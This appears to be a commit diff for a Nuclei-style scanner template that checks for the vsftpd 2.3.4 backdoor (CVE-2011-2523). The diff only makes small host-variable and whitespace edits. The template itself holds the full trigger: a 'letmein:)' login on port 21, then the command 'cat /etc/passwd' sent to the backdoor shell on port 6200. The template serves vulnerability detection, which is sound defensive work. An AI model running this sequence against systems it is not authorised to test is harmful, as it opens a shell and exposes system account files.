Update CVE-2011-2523.yaml (#6975)
parent
93ec5c4f90
commit
4d524fd178
|
@ -19,21 +19,20 @@ info:
|
|||
tags: cve,cve2011,network,vsftpd,ftp,backdoor
|
||||
|
||||
variables:
|
||||
cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs
|
||||
|
||||
cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs
|
||||
|
||||
network:
|
||||
- inputs:
|
||||
- data: "USER letmein:)\r\nPASS please\r\n"
|
||||
read: 100
|
||||
host:
|
||||
- "{{Hostname}}:21"
|
||||
- "{{Host}}:21"
|
||||
|
||||
- inputs:
|
||||
- data: "{{cmd}}\n"
|
||||
read: 100
|
||||
host:
|
||||
- "{{Hostname}}:6200"
|
||||
- "{{Host}}:6200"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
|
|
Loading…
Reference in New Issue